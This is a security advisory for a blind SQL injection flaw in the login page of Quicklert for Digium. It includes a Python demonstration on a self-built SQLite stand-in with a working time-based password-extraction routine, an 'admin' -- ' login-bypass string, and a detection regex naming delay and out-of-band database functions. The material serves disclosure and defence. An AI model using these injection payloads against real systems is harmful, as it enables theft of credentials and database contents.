PT-2022-11959 · Digium · Quicklert For Digium

Nick Berrie

·

Published

2022-03-07

·

Updated

2022-03-15

·

CVE-2021-43969

CVSS v2.0

7.8

High

Vector AV:N/AC:L/Au:N/C:C/I:N/A:N
Name of the Vulnerable Software and Affected Versions: Quicklert for Digium version 10.0.0 (1043)
Description: The issue affects the login.jsp page, which is vulnerable to Blind SQL Injection with Out-of-Band Interaction (DNS) and Blind Time-Based SQL Injection via the uname parameter. Because the injected condition changes only the response time (or triggers a DNS lookup) and not the page content, an attacker can infer the result of arbitrary queries and disclose all data within the database, including the login IDs and passwords of administrative accounts.
Recommendations: For Quicklert for Digium version 10.0.0 (1043), restrict access to the login.jsp page (for example, to trusted networks) until a fix is available. The injection is reached only through the uname parameter of login.jsp, so requests to that page whose uname value contains quote characters, database delay functions or out-of-band lookup primitives should be treated as exploitation attempts and blocked or alerted on. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
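The technique described above, demonstrated on a constructed stand-in rather than on Quicklert itself (this is an added example, not Quicklert's code, and it is not a reproduction against the product). The in-memory SQLite database, the users table, the admin password "s3cret" and the registered sleep() function are all assumptions made so the time-based oracle can be exercised offline; the out-of-band DNS variant is not simulated. The block shows the vulnerable string-concatenated login query beside its parameterized fix, extracts the admin password using only response timing, and includes a small request-level heuristic of the kind a WAF rule or log triage could use on the uname parameter.

```python
import re
import sqlite3
import time

DELAY = 0.05  # seconds the injected condition sleeps when true (assumed)

# Scalar subquery the attacker targets (assumed schema, not Quicklert's)
ADMIN_SECRET = "(SELECT password FROM users WHERE is_admin = 1)"


def build_db():
    """Constructed stand-in for a login backend with one admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uname TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "s3cret", 1), ("bob", "hunter2", 0)])

    # Emulates a DBMS delay primitive (MySQL SLEEP, MSSQL WAITFOR DELAY)
    # so a time-based oracle can be demonstrated without a real server.
    def sleep_fn(seconds):
        time.sleep(seconds)
        return 0

    conn.create_function("sleep", 1, sleep_fn)
    return conn


def vulnerable_login(conn, uname, password):
    """Vulnerable pattern: uname becomes part of the SQL text itself."""
    sql = ("SELECT uname FROM users WHERE uname = '" + uname +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, uname, password):
    """Hardened form: bound parameters keep uname out of the SQL grammar."""
    sql = "SELECT uname FROM users WHERE uname = ? AND password = ?"
    return conn.execute(sql, (uname, password)).fetchone() is not None


def time_oracle(conn, condition):
    """True if CONDITION holds, judged only by response time.

    The login result is False either way, which is what makes the
    injection blind: the attacker learns nothing from the page body.
    """
    payload = ("' OR (CASE WHEN " + condition + " THEN sleep(" +
               str(DELAY) + ") ELSE 0 END) -- ")
    start = time.perf_counter()
    vulnerable_login(conn, payload, "irrelevant")
    return time.perf_counter() - start >= DELAY * 0.8


def _bsearch(conn, expr, lo, hi):
    """Binary-search the integer value of EXPR; each probe asks 'value > mid?'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if time_oracle(conn, expr + " > " + str(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_admin_password(conn):
    """Recover the admin password one character at a time via timing alone."""
    length = _bsearch(conn, "length(" + ADMIN_SECRET + ")", 0, 64)
    chars = []
    for pos in range(1, length + 1):
        expr = "unicode(substr(" + ADMIN_SECRET + ", " + str(pos) + ", 1))"
        chars.append(chr(_bsearch(conn, expr, 32, 126)))
    return "".join(chars)


# Delay and out-of-band primitives commonly seen in blind probes (assumed list)
_PROBE = re.compile(r"(sleep\s*\(|waitfor\s+delay|pg_sleep|benchmark\s*\(|"
                    r"load_file\s*\(|xp_dirtree|utl_inaddr|utl_http|dbms_ldap)",
                    re.IGNORECASE)


def looks_like_blind_probe(uname):
    """Cheap heuristic for a uname value carrying a blind/OOB payload.

    Useful for a WAF rule or log triage on login.jsp; not a substitute
    for parameterizing the query.
    """
    return bool(_PROBE.search(uname))


if __name__ == "__main__":
    db = build_db()
    print("bypass via vulnerable query:", vulnerable_login(db, "admin' -- ", "x"))
    print("same input, safe query:     ", safe_login(db, "admin' -- ", "x"))
    print("extracted via timing:       ", extract_admin_password(db))
```

Running the block prints that the classic `admin' -- ` value logs in through the concatenated query but not through the parameterized one, and then recovers the admin password using nothing but the elapsed time of each request; the binary search needs about seven probes per character, which is why time-based blind extraction of a whole table is slow but entirely practical.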

Exploit

SQL injection


Weakness Enumeration

Related Identifiers

CVE-2021-43969

Affected Products

Quicklert For Digium